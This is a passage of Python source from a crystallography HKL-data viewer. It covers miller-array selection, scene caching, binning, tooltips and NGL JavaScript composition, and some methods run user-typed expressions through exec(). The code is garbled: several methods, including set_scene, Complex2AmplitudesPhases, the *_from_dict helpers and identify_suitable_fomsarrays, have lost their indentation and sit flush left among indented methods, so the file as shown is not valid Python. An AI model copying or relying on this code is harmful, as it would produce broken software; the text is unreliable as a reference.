      clipwidth = None
      isreciprocal = True
      if self.viewerparams.slice_mode: # explicit slicing
        # NOTE(review): hkl is only assigned for slice_axis in ("h","k","l");
        # any other value would raise NameError below — confirm phil restricts it
        if self.viewerparams.slice_axis=="h": hkl = [1,0,0]
        if self.viewerparams.slice_axis=="k": hkl = [0,1,0]
        if self.viewerparams.slice_axis=="l": hkl = [0,0,1]
        # NOTE(review): note the minus sign on the normal_hk term — verify
        R = hkl[0] * self.normal_kl + hkl[1] * self.normal_lh - hkl[2] * self.normal_hk
        clipwidth = 200
      if self.params.clip_plane.clipwidth and not self.viewerparams.slice_mode:
        clipwidth = self.params.clip_plane.clipwidth
        hkldist = self.params.clip_plane.hkldist
        R = flex.vec3_double( [(self.params.clip_plane.h, self.params.clip_plane.k, self.params.clip_plane.l)])
        if self.params.clip_plane.fractional_vector == "realspace" or self.params.clip_plane.fractional_vector == "tncs":
          isreciprocal = False
      self.clip_plane_vector(R[0][0], R[0][1], R[0][2], hkldist,
               clipwidth, self.viewerparams.NGL.fixorientation, self.params.clip_plane.is_parallel,
               isreciprocal)
      if self.viewerparams.inbrowser and not self.viewerparams.slice_mode:
        self.ExpandInBrowser(P1= self.viewerparams.expand_to_p1,
                              friedel_mate= self.viewerparams.expand_anomalous)
      self.SetOpacities(self.viewerparams.NGL.bin_opacities )
      # interpolate cell scale between 1 and the real space scale factor
      if self.params.real_space_unit_cell_scale_fraction is None:
        scale = None
      else:
        scale = (self.realspace_scale - 1.0)*self.params.real_space_unit_cell_scale_fraction + 1.0
      self.DrawUnitCell(scale )
      if self.params.reciprocal_unit_cell_scale_fraction is None:
        scale = None
      else:
        scale = (self.reciproc_scale - 1.0)*self.params.reciprocal_unit_cell_scale_fraction + 1.0
      self.DrawReciprocalUnitCell(scale )
      self.set_tooltip_opacity()
      self.set_show_tooltips()
def set_scene(self, scene_id):
self.binvals = []
self.isinjected = False
if scene_id is None:
return False
self.colour_scene_id = scene_id
self.radii_scene_id = scene_id
self.set_miller_array(scene_id)
if (self.miller_array is None):
raise Sorry("No data loaded!")
self.mprint( "Miller array %s runs from hkls: %s to %s" \
%(self.miller_array.info().label_string(), self.miller_array.index_span().min(),
self.miller_array.index_span().max() ) )
self.mprint("Spacegroup: %s" %self.miller_array.space_group().info().symbol_and_number())
return True
  def set_miller_array(self, scene_id=None, merge=None, details=""):
    """Make scene_id's miller array the current one and derive its metadata.

    scene_id: scene to select; None keeps the current viewerparams.scene_id.
    merge: stored verbatim in self.merge.
    details: extra text appended to the data summary printout.
    Updates d_min, space group, symops, default resolution binvals and the
    FOM pairing; a no-op (early return) when no miller array is selected.
    """
    if scene_id is not None:
      self.viewerparams.scene_id = scene_id
      self.isinjected = False
    if self.viewerparams and self.viewerparams.scene_id is not None and self.viewerparams.scene_id >= 0 and self.HKLscene:
      self.miller_array = self.HKLscene_from_dict(self.viewerparams.scene_id).miller_array
      self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
    self.merge = merge
    if (self.miller_array is None):
      return
    self.identify_suitable_fomsarrays()
    self.GetUnitcellScales()
    self.d_min = self.miller_array.d_min()
    array_info = self.miller_array.info()
    self.sg = self.miller_array.space_group()
    self.symops = self.sg.all_ops()
    # default bins: reciprocal of the resolution limits
    self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
    self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
      % (array_info.label_string(), details, self.miller_array.indices().size(), \
         self.miller_array.space_group_info(), uc), verbose=0 )
def Complex2AmplitudesPhases(self, data):
ampls = flex.abs(data)
phases = flex.arg(data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
#b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
#phases = phases.set_selected(b, 42.4242)
phases = graphics_utils.NoNansArray( phases, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
return ampls, phases
  def GetTooltipOnTheFly(self, id, sym_id, anomalous=False):
    """Assemble the tooltip string for reflection number id, optionally
    rotated by symmetry operator sym_id and/or negated for a Friedel mate.

    id: index into the current scene's reflection list.
    sym_id: index into self.symops; values outside range mean "no rotation".
    anomalous: when True show -H,-K,-L (the Friedel mate).
    Returns a javascript-escaped string listing H,K,L, resolution and the
    data (and sigmas/phases) of every loaded scene at this reflection.
    """
    hkl = self.scene.indices[id]
    hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
    rotmx=None
    if sym_id >= 0 and sym_id < len(self.symops):
      rotmx = self.symops[sym_id].r()
    Rhkl = hklvec[0]
    if rotmx:
      Rhkl = hklvec[0] * rotmx
    rothkl = Rhkl
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    if anomalous:
      rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
    spbufttip = '\'H,K,L: %d, %d, %d' %(rothkl[0], rothkl[1], rothkl[2])
    # resolution and angstrom character
    spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
      %str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
    for hklscene in self.HKLscenes:
      if hklscene.isUsingFOMs():
        continue # already have tooltips for the scene without the associated fom
      sigvals = None
      if hklscene.work_array.sigmas() is not None:
        sigvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).sigmas() )
      datval = None
      if hkl in hklscene.work_array.indices():
        datvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).data() )
      else:
        # fall back to positional lookup when hkl is absent from the work array
        if id >= hklscene.data.size():
          continue
        datvals = [ hklscene.data[id] ]
      # NOTE(review): sigvals is indexed with i below; this assumes the sigma
      # selection has at least as many entries as datvals — confirm
      for i,datval in enumerate(datvals):
        if not (math.isnan( abs(datval) ) or datval == display.inanval):
          if hklscene.work_array.is_complex_array():
            ampl = abs(datval)
            phase = cmath.phase(datval) * 180.0/math.pi
            # purge nan values from array to avoid crash in fmod_positive()
            # and replace the nan values with an arbitrary float value
            if math.isnan(phase):
              phase = 42.4242
            # Cast negative degrees to equivalent positive degrees
            phase = phase % 360.0
          spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
          if hklscene.work_array.is_complex_array():
            spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 1)) + \
              "\'+ String.fromCharCode(176) +\'" # degree character
          elif sigvals:
            sigma = sigvals[i]
            spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
          else:
            spbufttip += str(roundoff(datval, 2))
    spbufttip += '\\n\\n%d,%d,%d' %(id, sym_id, anomalous) # compared by the javascript
    spbufttip += '\''
    return spbufttip
def get_col_fomcol(self, idx):
if len(self.HKLInfo_from_dict()) == 0:
return -1, -1
return self.HKLInfo_from_dict(idx)[6], self.HKLInfo_from_dict(idx)[7]
  def SupersetMillerArrays(self):
    """Extend every processed miller array to the superset of all their hkls.

    Arrays are padded with NaN for indices they lack, sorted consistently and
    collected in self.match_valarrays so all arrays share the same hkl order.
    """
    self.match_valarrays = []
    # First loop over all miller arrays to make a superset of hkls of all
    # miller arrays. Then loop over all miller arrays and extend them with NaNs
    # as to contain the same hkls as the superset
    self.mprint("Gathering superset of miller indices...")
    superset_array = self.proc_arrays[0].deep_copy()
    set_of_indices = set([])
    for i,procarray in enumerate(self.proc_arrays):
      set_of_indices |= set( list(procarray.indices()) )
    self.mprint("Extending miller arrays to match superset of miller indices...")
    indiceslst = flex.miller_index( list( set_of_indices ) )
    for i,procarray in enumerate(self.proc_arrays):
      # first match indices in currently selected miller array with indices in the other miller arrays
      matchindices = miller.match_indices(indiceslst, procarray.indices() )
      valarray = procarray.select( matchindices.pairs().column(1) )
      #if valarray.anomalous_flag() != superset_array.anomalous_flag():
      #  superset_array._anomalous_flag = valarray._anomalous_flag
      #missing = indiceslst.lone_set( valarray.indices() )
      # indices present in the superset but absent from this array
      missing = indiceslst.select( miller.match_indices(valarray.indices(), indiceslst ).singles(1))
      # insert NAN values for reflections in self.miller_array not found in procarray
      valarray = display.ExtendMillerArray(valarray, missing.size(), missing )
      match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
      match_valarray = valarray.select( match_valindices.pairs().column(1) )
      match_valarray.sort(by_value="packed_indices")
      match_valarray.set_info(procarray.info() )
      self.match_valarrays.append( match_valarray )
    self.mprint("Done making superset")
  # NOTE: the triple-quoted string below is an earlier implementation of
  # SupersetMillerArrays kept for reference; being a bare string literal it
  # has no runtime effect.
  """
  def SupersetMillerArrays(self):
    self.match_valarrays = []
    # First loop over all miller arrays to make a superset of hkls of all
    # miller arrays. Then loop over all miller arrays and extend them with NaNs
    # as to contain the same hkls as the superset
    self.mprint("Gathering superset of miller indices...")
    superset_array = self.proc_arrays[0].deep_copy()
    for i,procarray in enumerate(self.proc_arrays):
      if i==0:
        continue
      # first match indices in currently selected miller array with indices in the other miller arrays
      matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
      valarray = procarray.select( matchindices.pairs().column(1) )
      if valarray.anomalous_flag() != superset_array.anomalous_flag():
        superset_array._anomalous_flag = valarray._anomalous_flag
      missing = procarray.lone_set( superset_array )
      superset_array = display.ExtendMillerArray(superset_array, missing.size(), missing.indices())
    self.mprint("Extending miller arrays to match superset of miller indices...")
    for i,procarray in enumerate(self.proc_arrays):
      # first match indices in currently selected miller array with indices in the other miller arrays
      matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
      valarray = procarray.select( matchindices.pairs().column(1) )
      if valarray.anomalous_flag() != superset_array.anomalous_flag():
        superset_array._anomalous_flag = valarray._anomalous_flag
      missing = superset_array.lone_set( valarray )
      # insert NAN values for reflections in self.miller_array not found in procarray
      valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices())
      match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
      match_valarray = valarray.select( match_valindices.pairs().column(1) )
      match_valarray.sort(by_value="packed_indices")
      match_valarray.set_info(procarray.info() )
      self.match_valarrays.append( match_valarray )
    self.mprint("Done making superset")
  """
  def ConstructReciprocalSpace(self, curphilparam, scene_id=None):
    """Create (or fetch from cache) the HKL scene(s) for display.

    curphilparam: full phil parameter set, part of the cache key.
    scene_id: when given, only that scene is (re)built; when None all scenes
    for all processed arrays are built and the GUI is notified.
    Scenes are cached in self.HKLscenedict keyed by every parameter that
    affects scene generation; returns True.
    """
    sceneid = scene_id
    # NOTE(review): when scene_id differs from viewerparams.scene_id the
    # local sceneid reverts to viewerparams.scene_id — confirm intended
    if scene_id is not None and scene_id != self.viewerparams.scene_id:
      sceneid = self.viewerparams.scene_id
    self.HKLsceneKey = (curphilparam.spacegroup_choice,
                        curphilparam.using_space_subgroup,
                        curphilparam.merge_data,
                        self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
                        self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
                        self.viewerparams.inbrowser,
                        self.viewerparams.slice_axis,
                        self.viewerparams.slice_mode,
                        self.viewerparams.slice_index,
                        self.viewerparams.show_missing,
                        self.viewerparams.show_only_missing,
                        self.viewerparams.show_systematic_absences,
                        self.viewerparams.sigma_radius,
                        self.viewerparams.sigma_color,
                        self.viewerparams.scene_id,
                        self.viewerparams.scale,
                        self.viewerparams.nth_power_scale_radii
                        )
    if self.HKLsceneKey in self.HKLscenedict and not self.has_new_miller_array:
      self.HKLscene = self.HKLscenedict.get(self.HKLsceneKey, False)
      if self.HKLscene:
        self.mprint("Using cached HKL scene", verbose=1)
        return True
    if self.has_new_miller_array:
      self.identify_suitable_fomsarrays()
    self.mprint("Constructing HKL scenes", verbose=0)
    assert(self.proc_arrays)
    if scene_id is None:
      # build scenes for every processed array (and each FOM pairing)
      hkl_scenes_info = []
      self.HKLscenes = []
      sceneid = 0
      for (idx, arr) in enumerate(self.proc_arrays):
        (hklscenes, scenemaxdata,
          scenemindata, scenemaxsigmas,
           sceneminsigmas, scenearrayinfos
         ) = MakeHKLscene( arr.deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
        for i,inf in enumerate(scenearrayinfos):
          self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=0)
          self.HKLsceneKey = (curphilparam.spacegroup_choice,
                              curphilparam.using_space_subgroup,
                              curphilparam.merge_data,
                              self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
                              self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
                              self.viewerparams.inbrowser,
                              self.viewerparams.slice_axis,
                              self.viewerparams.slice_mode,
                              self.viewerparams.slice_index,
                              self.viewerparams.show_missing,
                              self.viewerparams.show_only_missing,
                              self.viewerparams.show_systematic_absences,
                              self.viewerparams.sigma_radius,
                              self.viewerparams.sigma_color,
                              sceneid,
                              self.viewerparams.scale,
                              self.viewerparams.nth_power_scale_radii
                              )
          self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
            scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
          hkl_scenes_info.append(inf)
          self.HKLscenes.append(hklscenes[i])
          sceneid += 1
      self.hkl_scenes_info = hkl_scenes_info
      if self.viewerparams.scene_id is not None:
        # leave HKLsceneKey pointing at the currently selected scene
        self.HKLsceneKey = (curphilparam.spacegroup_choice,
                            curphilparam.using_space_subgroup,
                            curphilparam.merge_data,
                            self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
                            self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
                            self.viewerparams.inbrowser,
                            self.viewerparams.slice_axis,
                            self.viewerparams.slice_mode,
                            self.viewerparams.slice_index,
                            self.viewerparams.show_missing,
                            self.viewerparams.show_only_missing,
                            self.viewerparams.show_systematic_absences,
                            self.viewerparams.sigma_radius,
                            self.viewerparams.sigma_color,
                            self.viewerparams.scene_id,
                            self.viewerparams.scale,
                            self.viewerparams.nth_power_scale_radii
                            )
      scenearraylabeltypes = [ (e[3], e[4], e[1], sceneid) for sceneid,e in enumerate(hkl_scenes_info) ]
      self.SendInfoToGUI({ "scene_array_label_types": scenearraylabeltypes, "NewHKLscenes" : True })
    else:
      # rebuild only the scene(s) of the array backing scene_id
      idx = self.scene_id_to_array_id(scene_id)
      (hklscenes, scenemaxdata,
        scenemindata, scenemaxsigmas,
         sceneminsigmas, scenearrayinfos
       ) = MakeHKLscene( self.proc_arrays[idx].deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
      for i,inf in enumerate(scenearrayinfos):
        self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=0)
        self.HKLsceneKey = (curphilparam.spacegroup_choice,
                            curphilparam.using_space_subgroup,
                            curphilparam.merge_data,
                            self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
                            self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
                            self.viewerparams.inbrowser,
                            self.viewerparams.slice_axis,
                            self.viewerparams.slice_mode,
                            self.viewerparams.slice_index,
                            self.viewerparams.show_missing,
                            self.viewerparams.show_only_missing,
                            self.viewerparams.show_systematic_absences,
                            self.viewerparams.sigma_radius,
                            self.viewerparams.sigma_color,
                            scene_id,
                            self.viewerparams.scale,
                            self.viewerparams.nth_power_scale_radii
                            )
        self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
          scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
    (
      self.HKLscene,
      self.HKLscenesMaxdata,
      self.HKLscenesMindata,
      self.HKLscenesMaxsigmas,
      self.HKLscenesMinsigmas,
      self.hkl_scenes_info
    ) = self.HKLscenedict[self.HKLsceneKey]
    self.sceneisdirty = True
    self.has_new_miller_array = False
    return True
def Sceneid_to_SceneKey(self, sceneid):
return (self.params.spacegroup_choice,
self.params.using_space_subgroup,
self.params.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_radius,
self.viewerparams.sigma_color,
sceneid,
self.viewerparams.scale,
self.viewerparams.nth_power_scale_radii
)
def HKLscene_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][0]
def HKLMaxData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][1]
def HKLMinData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][2]
def HKLMaxSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][3]
def HKLMinSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][4]
def HKLInfo_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][5]
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays")
self.mapcoef_fom_dict = {}
self.sceneid_from_arrayid = []
for k,proc_array in enumerate(self.proc_arrays):
fom_arrays_idx = []
array_scene_ids = [(k,k)]
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or flex.max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
array_scene_ids.append((k,i))
self.sceneid_from_arrayid.extend( array_scene_ids)
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def scene_id_to_array_id(self, scene_id):
for i,array_scene_id in enumerate(self.sceneid_from_arrayid):
if scene_id == i:
return array_scene_id[0]
return None
  def calc_bin_thresholds(self, bin_labels_type_idx, nbins):
    """Compute bin threshold values for the quantity selected for binning.

    bin_labels_type_idx: the phil string repr of a (label, datatype, col,
    sceneid) tuple selecting what to bin on.
    nbins: requested number of bins.
    Returns (binvals, nuniquevalues): sorted threshold values and the number
    of distinct values of the binned quantity.
    NOTE(review): eval() on a phil-supplied string — assumes the phil layer
    only ever passes a trusted tuple literal here; confirm.
    """
    self.bin_labels_type_idx = eval(bin_labels_type_idx)
    binscenelabel = self.bin_labels_type_idx[0]
    if binscenelabel=="Resolution":
      # bin on d-spacings using a miller.binning of the current scene
      warray = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).work_array
      dres = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).dres
      uc = warray.unit_cell()
      indices = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).indices
      binning = miller.binning( uc, nbins, indices, flex.max(dres), flex.min(dres) )
      binvals = [ binning.bin_d_range(n)[0] for n in binning.range_all() ]
      binvals = [ e for e in binvals if e != -1.0] # delete dummy limit
      binvals = list( 1.0/flex.double(binvals) )
      nuniquevalues = len(set(list(dres)))
    elif binscenelabel=="Singletons":
      binvals = [ -1.5, -0.5, 0.5, 1.5 ]
      nuniquevalues = len(binvals)
    else:
      # bin on the data values themselves, in equally populated bins
      bindata, dummy = self.get_matched_binarray()
      selection = flex.sort_permutation( bindata )
      bindata_sorted = bindata.select(selection)
      # get binvals by dividing bindata_sorted with nbins
      binvals = [bindata_sorted[0]] * nbins #
      for i,e in enumerate(bindata_sorted):
        idiv = int(nbins*float(i)/len(bindata_sorted))
        binvals[idiv] = e
      nuniquevalues = len(set(list(bindata)))
    binvals.sort()
    return binvals, nuniquevalues
def UpdateBinValues(self, binvals = [], nuniquevalues = 0):
if binvals:
binvals.sort()
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
self.nuniqueval = nuniquevalues
  def get_matched_binarray(self):
    """Fetch the data array selected for binning along with suggested bin
    boundaries.

    Uses self.bin_labels_type_idx (label, datatype, column, sceneid) to pick
    sigmas, phases, amplitudes or plain data of the chosen scene.
    Returns (bindata, binvalsboundaries); boundaries are the cached min/max
    widened by 0.1, except for phases where centric values (0/180/360 deg)
    are pre-selected.
    """
    sceneid = self.bin_labels_type_idx[3]
    datatype = self.bin_labels_type_idx[1]
    binscenelabel = self.bin_labels_type_idx[0]
    label = self.HKLscene_from_dict(sceneid).work_array.info().label_string()
    if datatype == "hassigmas" and binscenelabel == "Sigmas of " + label:
      bindata = self.HKLscene_from_dict(sceneid).sigmas.deep_copy()
      binvalsboundaries = [ self.HKLMinSigmas_from_dict(sceneid) - 0.1 , self.HKLMaxSigmas_from_dict(sceneid) + 0.1 ]
    elif datatype == "iscomplex" and "Phases of " + label in binscenelabel:
      bindata = self.HKLscene_from_dict(sceneid).phases.deep_copy()
      # preselect centric reflections, i.e. those with phi = 0 or 180
      binvalsboundaries = [-0.01, 0.01, 179.99, 180.01, 359.99, 360]
    elif datatype == "iscomplex" and "Amplitudes of " + label in binscenelabel:
      bindata = self.HKLscene_from_dict(sceneid).ampl.deep_copy()
      binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
    else:
      bindata = self.HKLscene_from_dict(sceneid).data.deep_copy()
      binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
    return bindata, binvalsboundaries
  def MatchBinArrayToSceneArray(self):
    """Reorder the binning data array so it runs parallel to the currently
    displayed scene array, inserting NaN where the scene has reflections the
    bin array lacks.

    Returns a flex.double (or 1/dres when binning on resolution) with one
    entry per reflection of the current scene.
    """
    # match bindata with data or sigmas
    if self.bin_labels_type_idx[0] == "Resolution":
      return 1.0/self.scene.dres
    binarraydata, dummy = self.get_matched_binarray()
    scenearraydata = self.HKLscene_from_dict(self.viewerparams.scene_id).data
    ibinarray = self.bin_labels_type_idx[3]
    matchindices = miller.match_indices(self.HKLscene_from_dict(self.viewerparams.scene_id).indices,
                                        self.HKLscene_from_dict(ibinarray).indices )
    matched_binarray = binarraydata.select( matchindices.pairs().column(1) )
    #valarray.sort(by_value="packed_indices")
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    #missing = scenearraydata.lone_set( valarray )
    # insert NAN values for reflections in self.miller_array not found in binarray
    #valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices() )
    #match_valindices = miller.match_indices(scenearray.indices(), valarray.indices() )
    #match_valarray = valarray.select( match_valindices.pairs().column(1) )
    #match_valarray.sort(by_value="packed_indices")
    #match_valarray.set_info(binarraydata.info() )
    # patch the bin array so its sequence matches the scene array
    patched_binarraydata = []
    c = 0
    for b in matchindices.pair_selection(0):
      if b:
        patched_binarraydata.append(matched_binarray[c])
        c +=1
      else:
        patched_binarraydata.append(float("nan"))
    return flex.double(patched_binarraydata)
  def OperateOn1MillerArray(self, millarr, operation):
    """Create a new miller array by running a user-supplied python expression
    on a copy of millarr.

    operation: python source that may read 'data', 'sigmas', 'dres' and must
    assign 'newdata' (and optionally 'newsigmas').
    Returns the new miller array, or None if the expression raised.
    NOTE(review): exec() of user input is a deliberate feature here (the GUI
    lets the user type an expression); never expose this to untrusted input.
    """
    # lets user specify a one line python expression operating on data, sigmas
    newarray = millarr.deep_copy()
    data = newarray.data()
    sigmas = newarray.sigmas()
    dres = newarray.unit_cell().d( newarray.indices() )
    self.mprint("Creating new miller array through the operation: %s" %operation)
    try:
      newdata = None
      newsigmas = None
      ldic= {'data': data, 'sigmas': sigmas, 'dres': dres }
      exec(operation, globals(), ldic)
      newdata = ldic.get("newdata", None)
      newarray._data = newdata
      newsigmas = ldic.get("newsigmas", None)
      newarray._sigmas = newsigmas
      return newarray
    except Exception as e:
      self.mprint( str(e), verbose=0)
      return None
  def OperateOn2MillerArrays(self, millarr1, millarr2, operation):
    """Create a new miller array by running a user-supplied python expression
    on the matched common reflections of two miller arrays.

    operation: python source that may read 'data1', 'sigmas1', 'data2',
    'sigmas2', 'dres' and must assign 'newdata' (and optionally 'newsigmas').
    Returns the new miller array (on millarr2's matched index set), or None
    if the expression raised.
    NOTE(review): exec() of user input is a deliberate feature here (the GUI
    lets the user type an expression); never expose this to untrusted input.
    """
    # lets user specify a one line python expression operating on data1 and data2
    matchindices = miller.match_indices(millarr1.indices(), millarr2.indices() )
    matcharr1 = millarr1.select( matchindices.pairs().column(0) ).deep_copy()
    matcharr2 = millarr2.select( matchindices.pairs().column(1) ).deep_copy()
    data1 = matcharr1.data()
    data2 = matcharr2.data()
    sigmas1 = matcharr1.sigmas()
    sigmas2 = matcharr2.sigmas()
    dres = matcharr1.unit_cell().d( matcharr1.indices() )
    newarray = matcharr2.deep_copy()
    newarray._sigmas = None
    self.mprint("Creating new miller array through the operation: %s" %operation)
    try:
      newdata = None
      newsigmas = None
      ldic= {'data1': data1, 'sigmas1': sigmas1, 'data2': data2, 'sigmas2': sigmas2, 'dres': dres }
      exec(operation, globals(), ldic)
      newdata = ldic.get("newdata", None)
      newarray._data = newdata
      newsigmas = ldic.get("newsigmas", None)
      newarray._sigmas = newsigmas
      return newarray
    except Exception as e:
      self.mprint( str(e), verbose=0)
      return None
def DrawNGLJavaScript(self, blankscene=False):
    """Compose the NGL JavaScript that renders the current HKL scene and
    push it to the browser.

    Builds, in order: the reciprocal axes arrows, the per-bin sphere/point
    buffers (reflections are binned either by resolution, singleton status
    or a matched second miller array), the colour gradient chart, and the
    websocket handler boilerplate. The script is written to
    self.jscriptfname (if set) and the browser is (re)loaded.

    blankscene=True emits an empty scene (no reflections, no axes).
    """
    if not self.scene or not self.sceneisdirty:
        return
    if self.miller_array is None :
        self.mprint( "Select an HKL scene to display reflections" )
        return
    self.mprint("Composing JavaScript...")
    # reciprocal axes of the scene and their unit vectors / plane normals
    h_axis = flex.vec3_double([self.scene.axes[0]])
    k_axis = flex.vec3_double([self.scene.axes[1]])
    l_axis = flex.vec3_double([self.scene.axes[2]])
    self.unit_h_axis = 1.0/h_axis.norm() * h_axis
    self.unit_k_axis = 1.0/k_axis.norm() * k_axis
    self.unit_l_axis = 1.0/l_axis.norm() * l_axis
    self.unit_normal_hk = self.unit_h_axis.cross( self.unit_k_axis )
    self.unit_normal_kl = self.unit_k_axis.cross( self.unit_l_axis )
    self.unit_normal_lh = self.unit_l_axis.cross( self.unit_h_axis )
    self.normal_hk = h_axis.cross( k_axis )
    self.normal_kl = k_axis.cross( l_axis )
    self.normal_lh = l_axis.cross( h_axis )
    # axis arrows extend a little (10%/15%) beyond the longest axis
    maxnorm = max(h_axis.norm(), max(k_axis.norm(), l_axis.norm()))
    l1 = self.scene.renderscale * maxnorm * 1.1
    l2= self.scene.renderscale * maxnorm * 1.15
    Hstararrowstart = roundoff( [-self.unit_h_axis[0][0]*l1, -self.unit_h_axis[0][1]*l1, -self.unit_h_axis[0][2]*l1] )
    Hstararrowend = roundoff( [self.unit_h_axis[0][0]*l1, self.unit_h_axis[0][1]*l1, self.unit_h_axis[0][2]*l1] )
    Hstararrowtxt = roundoff( [self.unit_h_axis[0][0]*l2, self.unit_h_axis[0][1]*l2, self.unit_h_axis[0][2]*l2] )
    Kstararrowstart = roundoff( [-self.unit_k_axis[0][0]*l1, -self.unit_k_axis[0][1]*l1, -self.unit_k_axis[0][2]*l1] )
    Kstararrowend = roundoff( [self.unit_k_axis[0][0]*l1, self.unit_k_axis[0][1]*l1, self.unit_k_axis[0][2]*l1] )
    Kstararrowtxt = roundoff( [self.unit_k_axis[0][0]*l2, self.unit_k_axis[0][1]*l2, self.unit_k_axis[0][2]*l2] )
    Lstararrowstart = roundoff( [-self.unit_l_axis[0][0]*l1, -self.unit_l_axis[0][1]*l1, -self.unit_l_axis[0][2]*l1] )
    Lstararrowend = roundoff( [self.unit_l_axis[0][0]*l1, self.unit_l_axis[0][1]*l1, self.unit_l_axis[0][2]*l1] )
    Lstararrowtxt = roundoff( [self.unit_l_axis[0][0]*l2, self.unit_l_axis[0][1]*l2, self.unit_l_axis[0][2]*l2] )
    # make arrow font size roughly proportional to radius of highest resolution shell
    #fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
    if not self.miller_array:
        fontsize = 1.0
    else:
        fontsize = 1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/2.0))
    #fontsize *= self.viewerparams.NGL.fontsize/7.0
    # NOTE: the computed fontsize above is overridden by the user setting here
    fontsize = str(self.viewerparams.NGL.fontsize)
    if blankscene:
        axisfuncstr = "\nvar MakeHKL_Axis = function() { };\n"
    else:
        axisfuncstr = """
var fontsize = %s;
function MakeHKL_Axis(mshape)
{
// xyz arrows
// mshape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origin');
//blue-x
